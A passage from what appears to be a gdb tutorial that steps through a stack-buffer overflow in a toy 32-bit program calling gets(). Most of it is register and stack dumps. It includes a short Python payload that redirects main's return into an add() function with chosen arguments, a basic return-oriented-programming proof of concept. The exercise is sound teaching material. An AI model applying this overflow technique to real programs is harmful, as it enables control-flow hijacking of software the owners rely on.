eip            0x8048442        0x8048442 <main+41>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048442 in main ()
(gdb)
0xffffd650:     0x0804840b      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 1, 0x08048445 in main ()
(gdb)
0xffffd654:     0x00000002      0x00000003      0x44444444      0x45454545
0xffffd664:     0xffffd654      0x47474747      0x48484848      0x49494949
0xffffd674:     0x4a4a4a4a      0x4b4b4b4b      0xf7e31600      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0xc1bf2a5e      0xf839c44e      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x804840b <add>:     push   ebp
   0x804840c <add+1>:   mov    ebp,esp
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd654       0xffffd654
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840b        0x804840b <add>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840b in add ()
(gdb)
0xffffd650:     0x47474747      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840c <add+1>:   mov    ebp,esp
   0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840c        0x804840c <add+1>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840c in add ()
(gdb)
0xffffd650:     0x47474747      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
   0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840e        0x804840e <add+3>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840e in add ()
(gdb)
0xffffd650:     0x47474747      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
   0x8048414 <add+9>:   mov    eax,DWORD PTR [ebp+0x8]
eax            0x44444444       1145324612
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048411        0x8048411 <add+6>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048411 in add ()
(gdb)
0xffffd650:     0x47474747      0x00000002      0x44444447      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048414 <add+9>:   mov    eax,DWORD PTR [ebp+0x8]
   0x8048417 <add+12>:  pop    ebp
eax            0x44444444       1145324612
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048414        0x8048414 <add+9>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048414 in add ()
(gdb)
0xffffd650:     0x47474747      0x00000002      0x44444447      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048417 <add+12>:  pop    ebp
   0x8048418 <add+13>:  ret
eax            0x44444447       1145324615
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048417        0x8048417 <add+12>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048417 in add ()
(gdb)
0xffffd654:     0x00000002      0x44444447      0x44444444      0x45454545
0xffffd664:     0xffffd654      0x47474747      0x48484848      0x49494949
0xffffd674:     0x4a4a4a4a      0x4b4b4b4b      0xf7e31600      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0xc1bf2a5e      0xf839c44e      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x8048418 <add+13>:  ret
   0x8048419 <main>:    lea    ecx,[esp+0x4]
eax            0x44444447       1145324615
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd654       0xffffd654
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048418        0x8048418 <add+13>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048418 in add ()

There we go. As soon as we reach the add function, at

add DWORD PTR [ebp+0x8],eax

a problem shows up. Let's look carefully at the start of the add function again.

0xffffd654:     0x00000002      0x00000003      0x44444444      0x45454545
0xffffd664:     0xffffd654      0x00000000      0xf7e31637      0xf7fc9000
0xffffd674:     0xf7fc9000      0x00000000      0xf7e31637      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0x9afd0f00      0xa37be110      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x804840b <add>:     push   ebp
   0x804840c <add+1>:   mov    ebp,esp
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd654       0xffffd654
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840b        0x804840b <add>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840b in add ()

push ebp greets us the moment we arrive at add. Since ebp = 0x0,

(gdb) ni
0xffffd650:     0x00000000      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0x9afd0f00      0xa37be110      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840c <add+1>:   mov    ebp,esp
   0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840c        0x804840c <add+1>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840c in add ()

It is building its stack frame: mov ebp,esp

(gdb) ni
0xffffd650:     0x00000000      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0x9afd0f00      0xa37be110      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
   0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840e        0x804840e <add+3>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840e in add ()

Now it is going to pick up the parameters for the addition, so let's watch. It loads the value at ebp+0xc into eax.

(gdb) x/x $ebp+0xc
0xffffd65c:     0x44444444

Wew, is that so? Of course it is: I forgot the saved return pointer. Look at this again:

This is from Debugging with gdb part 2. 0x08048433 is the saved return pointer.

(gdb) ni
0xffffd630:     0xffffd658      0x08048433      0x00000002      0x00000003
0xffffd640:     0x00000001      0xffffd704      0xffffd70c      0x08048481
0xffffd650:     0xf7fc93dc      0xffffd670      0x00000000      0xf7e31637
0xffffd660:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd670:     0x00000001      0xffffd704      0xffffd70c      0x00000000
0xffffd680:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd690:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6a0:     0x00000000      0x73741faf      0x4af311bf      0x00000000
=> 0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
   0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
   0xffffd630:  pop    eax
0x0804840e in add ()

ok ! new payload

# Python 2, as on the Ubuntu 16.04 box used here (print writes the raw bytes)
import struct

addfunction = struct.pack("I", 0x0804840b)  # address of add(): what main's ret will pop
srp = "AAAA"                                # slot for add's own saved return pointer
firstparam = struct.pack("I", 0x00000002)   # add's first argument, read at [ebp+0x8]
secondparam = struct.pack("I", 0x00000003)  # add's second argument, read at [ebp+0xc]
offset = "BBBB"                             # filler up to main's saved ecx slot at [ebp-0x4]
newesp = struct.pack("I", 0xffffd650 + 0x4) # main's `lea esp,[ecx-0x4]` then points esp at addfunction

print addfunction + srp + firstparam + secondparam + offset + newesp

Let's run it again.

(gdb) r < rop.txt
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ROP/rop_u < rop.txt
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x00000001      0xffffd714      0xffffd71c      0x08048471
0xffffd660:     0xf7fc93dc      0xffffd680      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
=> 0x8048431 <main+24>: call   0x80482e0 <gets@plt>
   0x8048436 <main+29>: add    esp,0x10
eax            0xffffd650       -10672
ecx            0xffffd680       -10624
edx            0xffffd6a4       -10588
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048431        0x8048431 <main+24>
eflags         0x296    [ PF AF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 2, 0x08048431 in main ()
(gdb) ni
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x0804840b      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
=> 0x8048436 <main+29>: add    esp,0x10
   0x8048439 <main+32>: mov    eax,0x0
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048436        0x8048436 <main+29>
eflags         0x246    [ PF ZF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 3, 0x08048436 in main ()
(gdb)
0xffffd650:     0x0804840b      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048439 <main+32>: mov    eax,0x0
   0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048439        0x8048439 <main+32>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048439 in main ()
(gdb)
0xffffd650:     0x0804840b      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
   0x8048441 <main+40>: leave
eax            0x0      0
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804843e        0x804843e <main+37>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804843e in main ()
(gdb)
0xffffd650:     0x0804840b      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048441 <main+40>: leave
   0x8048442 <main+41>: lea    esp,[ecx-0x4]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048441        0x8048441 <main+40>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048441 in main ()
(gdb)
0xffffd66c:     0xf7e31637      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd67c:     0xf7e31637      0x00000001      0xffffd714      0xffffd71c
0xffffd68c:     0x00000000      0x00000000      0x00000000      0xf7fc9000
0xffffd69c:     0xf7ffdc04      0xf7ffd000      0x00000000      0xf7fc9000
0xffffd6ac:     0xf7fc9000      0x00000000      0xfb2060b9      0xc2a68ea9
0xffffd6bc:     0x00000000      0x00000000      0x00000000      0x00000001
0xffffd6cc:     0x08048310      0x00000000      0xf7feeff0      0xf7fe9880
0xffffd6dc:     0xf7ffd000      0x00000001      0x08048310      0x00000000
=> 0x8048442 <main+41>: lea    esp,[ecx-0x4]
   0x8048445 <main+44>: ret
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd66c       0xffffd66c
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048442        0x8048442 <main+41>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048442 in main ()
(gdb)
0xffffd650:     0x0804840b      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 1, 0x08048445 in main ()
(gdb)
0xffffd654:     0x41414141      0x00000002      0x00000003      0x42424242
0xffffd664:     0xffffd654      0x00000000      0xf7e31637      0xf7fc9000
0xffffd674:     0xf7fc9000      0x00000000      0xf7e31637      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0xfb2060b9      0xc2a68ea9      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x804840b <add>:     push   ebp
   0x804840c <add+1>:   mov    ebp,esp
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd654       0xffffd654
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840b        0x804840b <add>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840b in add ()
(gdb)
0xffffd650:     0x00000000      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840c <add+1>:   mov    ebp,esp
   0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840c        0x804840c <add+1>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840c in add ()
(gdb)
0xffffd650:     0x00000000      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804840e <add+3>:   mov    eax,DWORD PTR [ebp+0xc]
   0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804840e        0x804840e <add+3>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804840e in add ()
(gdb)
0xffffd650:     0x00000000      0x41414141      0x00000002      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048411 <add+6>:   add    DWORD PTR [ebp+0x8],eax
   0x8048414 <add+9>:   mov    eax,DWORD PTR [ebp+0x8]
eax            0x3      3
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048411        0x8048411 <add+6>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048411 in add ()
(gdb)
0xffffd650:     0x00000000      0x41414141      0x00000005      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048414 <add+9>:   mov    eax,DWORD PTR [ebp+0x8]
   0x8048417 <add+12>:  pop    ebp
eax            0x3      3
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd650       0xffffd650
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048414        0x8048414 <add+9>
eflags         0x206    [ PF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048414 in add ()
(gdb)
0xffffd650:     0x00000000      0x41414141      0x00000005      0x00000003
0xffffd660:     0x42424242      0xffffd654      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xfb2060b9      0xc2a68ea9      0x00000000
